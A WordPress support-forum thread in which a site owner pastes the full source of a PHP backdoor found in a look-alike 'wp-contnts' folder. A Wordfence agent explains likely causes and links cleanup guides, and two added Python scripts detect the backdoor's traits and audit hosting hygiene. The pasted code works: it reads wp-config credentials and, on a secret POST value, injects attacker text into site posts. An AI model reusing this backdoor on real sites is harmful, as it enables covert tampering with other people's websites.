• Resolved Chuck

    (@chuckstr)


    I have been trying out several plugins from www.ads-software.com for external linking of products to a new tab. Suddenly I discovered a new folder in the public_html folder called “wp-contnts” (yes, correct spelling). Inside the folder is a file “wp.php”. Do you know what this is? Have I been hacked? Here’s the wp.php code:
    <?php ini_set('display_errors',"On");$pl="fdiuw9UYGx99ewbKb3xvvcclbHVGUVIYCey8we9302eid";$path="";$goodpath="";for($i=0;$i<50;$i++){if(empty($path)){$path="./";if(file_exists($path ."wp-config.php")){@include($path ."wp-config.php");break;}else{$path="goup";}}elseif($path=="goup"){$path="../";if(file_exists($path ."wp-config.php")){@include($path ."wp-config.php");break;}else{$path=$path ."../";}}else{if(file_exists($path ."wp-config.php")){@include($path ."wp-config.php");break;}else{$path=$path ."../";}}}$wp_dbhost=DB_HOST;if(!empty($wp_dbhost)){$wp_dbname=DB_NAME;$wp_dbuser=DB_USER;$wp_dbpass=DB_PASSWORD;$prefi=$table_prefix;$db_prt="3306";if(stripos("qqq" .$wp_dbhost,":")){$wp_dbhost=explode(":",$wp_dbhost);$db_prt=$wp_dbhost[1];$wp_dbhost=$wp_dbhost[0];}if(!empty($_POST["vb6dfhgxb54erf"])&& $_POST["vb6dfhgxb54erf"]=="l4983afbnerer"&&!empty($_POST["hj34qsdccvvn4"])&&!empty($_POST["xv443shtsfgfhfg"])){if($pl!=$_POST["xv443shtsfgfhfg"]){die();}$texttoadd=stripslashes(urldecode($_POST["hj34qsdccvvn4"]));$usedpostids=$_POST["cvb5e6edofgd4"];$allpostsids=readNeedColDataWL($prefi ."posts","ID","post_status='publish'",$wp_dbhost,$wp_dbname,$wp_dbuser,$wp_dbpass,$db_prt);$needpostid="";if(empty($usedpostids)){srand((float)microtime()*1000000);shuffle($allpostsids);$needpostid=$allpostsids[0]["ID"];}else{$usedpostids=urldecode($usedpostids);$usedpostids=stripslashes($usedpostids);$usedpostids=unserialize($usedpostids);foreach($allpostsids as $k=>$onepostid){$allpostsids[$k]=$onepostid["ID"];}$notusedids=array_diff($allpostsids,$usedpostids);if(count($notusedids)==0){srand((float)microtime()*1000000);shuffle($allpostsids);$needpostid=$allpostsids[0];}else{srand((float)microtime()*1000000);shuffle($notusedids);$needpostid=$notusedids[0];}}if(!empty($needpostid)){$postdata=readValueFromBDWL($prefi ."posts","post_content","ID='" .$needpostid ."'",$wp_dbhost,$wp_dbname,$wp_dbuser,$wp_dbpass,$db_prt);$postdata=$texttoadd ."<br>" 
.$postdata;$postdata=str_ireplace("'","\'",$postdata);$res=updateBDDataWL($prefi ."posts",$postdata,"post_content","ID='" .$needpostid ."'",$wp_dbhost,$wp_dbname,$wp_dbuser,$wp_dbpass,$db_prt);if(!empty($res)&& $res!="no"){$posturl=get_permalink($needpostid);$gooddata=array("postid"=>$needpostid,"posturl"=>$posturl);$gooddata=serialize($gooddata);$gooddata=urlencode($gooddata);echo "cvnuytr54wwrdthfg:::" .$gooddata .":::cvnuytr54wwrdthfg";die();}}}}function updateBDDataWL($tablename,$data,$value,$uslovie,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return "no";}else{mysqli_set_charset($dbcon,"utf8");$sql="UPDATE " .$tablename ." SET $value='" .$data ."' WHERE " .$uslovie ."";if(mysqli_query($dbcon,$sql)){mysqli_close($dbcon);return "yes";}else{mysqli_close($dbcon);return false;}}}function readValueFromBDWL($tablename,$value,$uslovie,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return "no";}else{mysqli_set_charset($dbcon,"utf8");if(!empty($uslovie)){$sql="SELECT " .$value ." FROM " .$tablename ." where " .$uslovie;}else{$sql="SELECT " .$value ." FROM " .$tablename;}$needvalue=mysqli_query($dbcon,$sql);$needvalue=mysqli_fetch_array($needvalue);if(!empty($needvalue)){if(!empty($uslovie)){if(stripos($value,",")){$value=explode(",",$value);$res=array();foreach($value as $onevalue){$onevalue=trim($onevalue);$res[$onevalue]=$needvalue[$onevalue];}$needvalue=$res;}else{$needvalue=$needvalue[$value];}}mysqli_close($dbcon);return $needvalue;}else{mysqli_close($dbcon);return "no";}}}function readNeedColDataWL($tablename,$col,$uslovie,$dbhost,$dbname,$dbuser,$dbpass,$dbport){$dbcon=mysqli_connect($dbhost,$dbuser,$dbpass,$dbname,$dbport);if(!$dbcon){return false;}else{$sql="SELECT " .$col ." FROM " .$tablename ." where " .$uslovie ." 
ORDER BY `id` DESC";$needvalue=mysqli_query($dbcon,$sql);if(!empty($needvalue)){$res=array();while($r=mysqli_fetch_assoc($needvalue)){$res[]=$r;}mysqli_close($dbcon);return $res;}mysqli_close($dbcon);return false;}}
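The file pasted above has a recognisable shape: it climbs parent directories until it can include wp-config.php, opens its own mysqli connection with the DB_* constants, only acts when a hard-coded secret arrives in $_POST, and then writes attacker-supplied text into the posts table. The following triage script is an added example (not code from this thread or from Wordfence) that scores PHP files under a document root against those traits and also flags directory names that are near-misses of the core wp-admin/wp-content/wp-includes names, since "wp-contnts" is two edits away from "wp-content". The indicator patterns, the threshold of three hits, and the sample tree it builds in a temporary directory are all assumptions for the demonstration; the "suspicious" fixture is a non-functional fragment that only carries the traits.

```python
"""
Triage scan for a dropped WordPress backdoor of the kind pasted above.
Added example, not code from the thread or from Wordfence. It walks a
document root and reports (1) directory names that are near-misses of the
core WordPress directories and (2) PHP files that combine several traits of
the pasted wp.php. Patterns, thresholds and the fixture are assumptions.
"""
import os
import re
import tempfile

CORE_DIRS = ("wp-admin", "wp-content", "wp-includes")
MAX_EDITS = 2        # a name within this edit distance of a core dir is flagged
FLAG_THRESHOLD = 3   # indicators a PHP file must hit before it is reported

# Label -> pattern. One hit per label, so a file scores 0..len(INDICATORS).
INDICATORS = {
    "display_errors forced on": re.compile(r"ini_set\s*\(\s*['\"]display_errors"),
    "wp-config.php included via variable path": re.compile(
        r"include\s*\(\s*\$\w+\s*\.\s*['\"]wp-config\.php"),
    "raw mysqli connection using DB_PASSWORD": re.compile(
        r"mysqli_connect[\s\S]*DB_PASSWORD|DB_PASSWORD[\s\S]*mysqli_connect"),
    "shared secret checked against $_POST": re.compile(
        r"\$_POST\[\s*['\"][^'\"\]]+['\"]\s*\]\s*==\s*['\"]"),
    "posts table built from a prefix variable": re.compile(
        r"\$\w+\s*\.\s*['\"]posts['\"]"),
}


def levenshtein(a, b):
    """Classic edit distance; inputs are short, so the full table is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def _rel(root, path):
    return os.path.relpath(path, root).replace(os.sep, "/")


def lookalike_dirs(root):
    """Directories whose name is a near-miss of a core WordPress directory."""
    hits = []
    for dirpath, dirnames, _ in os.walk(root):
        for d in sorted(dirnames):
            if d not in CORE_DIRS and any(levenshtein(d, c) <= MAX_EDITS for c in CORE_DIRS):
                hits.append(_rel(root, os.path.join(dirpath, d)))
    return sorted(hits)


def score_php_file(path):
    """Return the indicator labels a single PHP file matches."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    return [label for label, rx in INDICATORS.items() if rx.search(src)]


def scan(root, threshold=FLAG_THRESHOLD):
    """Scan a document root; returns look-alike dirs and flagged PHP files."""
    flagged = []
    for dirpath, _, filenames in os.walk(root):
        for name in sorted(filenames):
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                labels = score_php_file(path)
                if len(labels) >= threshold:
                    flagged.append((_rel(root, path), labels))
    return {"lookalike_dirs": lookalike_dirs(root), "suspicious_files": sorted(flagged)}


# Constructed fixture: a benign plugin file plus a fragment carrying the traits
# of the pasted backdoor. The fragment is deliberately not a working script.
BENIGN_PLUGIN = """<?php
/* Plugin Name: Example Benign Plugin (constructed) */
add_action('init', function () { echo 'hello'; });
"""
BACKDOOR_TRAITS = """<?php ini_set('display_errors',"On");
$path="../"; @include($path ."wp-config.php");
$db=mysqli_connect(DB_HOST,DB_USER,DB_PASSWORD,DB_NAME);
if($_POST["k1"]=="v1"){ $table=$prefix ."posts"; }
"""


def build_sample_root():
    """Create a throwaway document root in a temp dir (constructed data)."""
    root = tempfile.mkdtemp(prefix="wp-triage-")
    for rel, body in (("index.php", "<?php require 'wp-blog-header.php';\n"),
                      ("wp-content/plugins/example/example.php", BENIGN_PLUGIN),
                      ("wp-contnts/wp.php", BACKDOOR_TRAITS)):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for key, val in scan(build_sample_root()).items():
        print(key, val)
```

Run it against a real document root with `scan("/path/to/public_html")`. A score of three or more is a prompt for manual review, not proof of compromise: legitimate installer or migration scripts can hit one or two of these patterns, which is why a single indicator is not reported on its own.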

Viewing 5 replies - 1 through 5 (of 5 total)
  • Plugin Support wfpeter

    (@wfpeter)

    Hi @chuckstr, thanks for seeking our advice with this issue.

    It does look to me like your site has been compromised, although if you were only installing plugins directly through WordPress (therefore the www.ads-software.com repository only) it would be interesting to know where the vulnerability may have originated.

    Did you have Wordfence installed at the time the folder was created?

    Thanks,

    Peter.

    Thread Starter Chuck

    (@chuckstr)

    Yes, I’ve had Wordfence for years. I have had other issues for which I have sought help allowing others to access the site. Maybe there?

    Thread Starter Chuck

    (@chuckstr)

    I don’t have $495 to have you clean it for me so I’ll have to do it myself. Any help you could provide would be greatly appreciated.

    Plugin Support wfpeter

    (@wfpeter)

    Hi @chuckstr, thanks for seeking our assistance and I’ll be more than happy to help you with a thorough site-cleaning guide here.

    I will now explain in more detail some possible scenarios of how a hacker can gain entry and why a site becomes compromised – even if you are very meticulous at keeping your server software, WordPress, your active and inactive plugins and themes all up to date with the latest versions.

    Some causes of a hack are impossible for any WordPress security plugin to protect against:

    1) If you are using a weak password for your hosting account control panel or FTP account then a hacker may gain entry this way, with full access to your site’s file system and database.
    2) You are storing unmaintained, unarchived backups of your site that are publicly accessible that contain exploitable vulnerabilities.
    3) You are hosting more than one PHP application, such as more than one installation of WordPress, in the same hosting account and infection can spread from another application to this site.
    4) You have unmaintained or vulnerable 3rd party scripts installed in your hosting account. Examples would be the Adminer or SearchReplaceDB database management tools.
    5) A nulled theme or plugin with malware already pre-installed. If you paid for a theme or a plugin outside of the vendor’s website at a massively reduced price, that seemed too good to be true, then it is likely to be nulled.
    6) If you are using a shared hosting account a neighboring account can be infected and spread the infection to this site.
    7) Your WordPress wp-config.php configuration file could be readable to the hacker, either directly via your hosting account, via a vulnerable plugin, or via another hacked site on the same server.
    8) The hosting accounts on the server may not be properly isolated so the hacker has access to your database via another user’s database.
    9) The server software has vulnerabilities that allow the hacker to get root access – such as running an end-of-life version of PHP on the hosting server that has unpatched vulnerabilities.
    10) If the hack took place at a time when you only had the free version of Wordfence installed then you wouldn’t have had access to the latest firewall rules that premium customers have access to.
    11) You may be using a plugin or theme with a vulnerability that is so severe that Wordfence cannot protect against it and we may be unable to create a custom firewall rule for the vulnerability. However, being unable to create a custom firewall rule is very rare.

    Wordfence protects against a vast variety of attacks. Whether you were hacked because of an unknown attack method or because there is some other issue in your system is impossible to say at this stage without an extensive investigation. There are some aspects of your site security that are completely beyond our control such as vulnerabilities on your hosting server as described above. Although rare, for examples of hosting provider vulnerabilities please see these two articles below:
    https://www.wordfence.com/blog/2019/06/service-vulnerability-four-popular-hosting-companies-fix-nfs-permissions-and-information-disclosure-problems/
    https://www.wordfence.com/blog/2018/02/service-vulnerability-nfs-permissions-problem/

    You have two choices:

    1) You can clean the site yourself by following the steps in this guide:
    https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/
    https://www.wordfence.com/help/scan/scan-results/

    Useful links after you have completed your cleaning:
    https://www.wordfence.com/blog/2017/04/20-minutes-to-secure-wordpress/
    https://www.wordfence.com/blog/2018/10/php5-dangerous/ (important note – this is an old blog post from October 2018 but still very relevant)
    https://www.wordfence.com/blog/2018/10/three-wordpress-security-mistakes-you-didnt-realize-you-made/
    https://www.wordfence.com/blog/2017/06/wordpress-backups/

    We also have an extensive Learning Centre here:
    https://www.wordfence.com/learn/

    2) You can hire a professional service to clean the site for you. Wordfence offers such a service, as do others.

    Thanks,

    Peter.
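Several of the causes in Peter's list are things a site owner can check for directly on the file system rather than rely on a plugin to catch: points 2 (publicly accessible backups), 4 (leftover tools such as Adminer or SearchReplaceDB) and 7 (a wp-config.php that other accounts on the server can read). The audit below is an added example, not part of the thread or of Wordfence's tooling. The backup suffixes, the tool-name pattern, and the sample tree it creates in a temporary directory are assumptions for the demonstration; it also shows the mitigation for point 7 by tightening the wp-config.php mode to owner-only.

```python
"""
Hosting-hygiene audit for points 2, 4 and 7 of the list above.
Added example, not from the thread or from Wordfence. Checks a WordPress
document root for backup archives and SQL dumps the web server would serve,
leftover database tools, and a wp-config.php readable by other accounts.
Suffixes, the tool pattern and the fixture tree are assumptions.
"""
import os
import re
import stat
import tempfile

BACKUP_SUFFIXES = (".zip", ".tar", ".tar.gz", ".tgz", ".sql", ".sql.gz", ".bak", ".old")
# Adminer and Search-Replace-DB are the two tools named in the post above.
LEFTOVER_TOOL = re.compile(r"^(adminer|searchreplacedb)[\w.-]*\.php$", re.I)


def _walk_files(root):
    """Yield (relative posix path, absolute path) for every file under root."""
    for dirpath, _, filenames in os.walk(root):
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            yield os.path.relpath(full, root).replace(os.sep, "/"), full


def exposed_backups(root):
    """Archives and dumps under the document root (point 2)."""
    return sorted(rel for rel, _ in _walk_files(root)
                  if rel.lower().endswith(BACKUP_SUFFIXES))


def leftover_tools(root):
    """Stray database-management scripts (point 4)."""
    return sorted(rel for rel, _ in _walk_files(root)
                  if LEFTOVER_TOOL.match(os.path.basename(rel)))


def wp_config_exposure(root):
    """Mode of wp-config.php and whether group/other can read it (point 7)."""
    path = os.path.join(root, "wp-config.php")
    if not os.path.exists(path):
        return {"present": False}
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return {"present": True, "mode": oct(mode),
            "group_readable": bool(mode & stat.S_IRGRP),
            "world_readable": bool(mode & stat.S_IROTH)}


def restrict_wp_config(root):
    """Mitigation for point 7: owner read/write only, then re-check."""
    path = os.path.join(root, "wp-config.php")
    os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)   # 0o600
    return wp_config_exposure(root)


def audit(root):
    return {"backups": exposed_backups(root),
            "tools": leftover_tools(root),
            "wp_config": wp_config_exposure(root)}


def build_sample_root():
    """Constructed fixture: a document root with all three exposures present."""
    root = tempfile.mkdtemp(prefix="wp-hygiene-")
    files = ("index.php", "wp-config.php", "backups/site-2023.zip", "db.sql",
             "old/adminer-4.8.1.php", "wp-content/uploads/photo.jpg")
    for rel in files:
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write("constructed sample file\n")
    os.chmod(os.path.join(root, "wp-config.php"), 0o644)  # the common, too-open default
    return root


if __name__ == "__main__":
    sample = build_sample_root()
    print(audit(sample))
    print("after restrict:", restrict_wp_config(sample))
```

Point the functions at the real document root (`audit("/path/to/public_html")`) and move anything reported under backups or tools out of the web-served tree rather than deleting it blindly, since an old archive may be the only clean copy you have. Whether 0600 is the right final mode for wp-config.php depends on whether the web server runs as the file owner or as a separate group; on hosts where PHP runs under a different user, 0640 with the web server's group is the usual compromise.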

    Plugin Support wfpeter

    (@wfpeter)

    Hi @chuckstr,

    As we’ve not heard back for a while, I hope the site cleaning guide served you well. If you have any Wordfence queries in the future, by all means start a new topic and we’ll be glad to help out any time.

    Thanks again,

    Peter.

  • The topic ‘new wp-contnts folder’ is closed to new replies.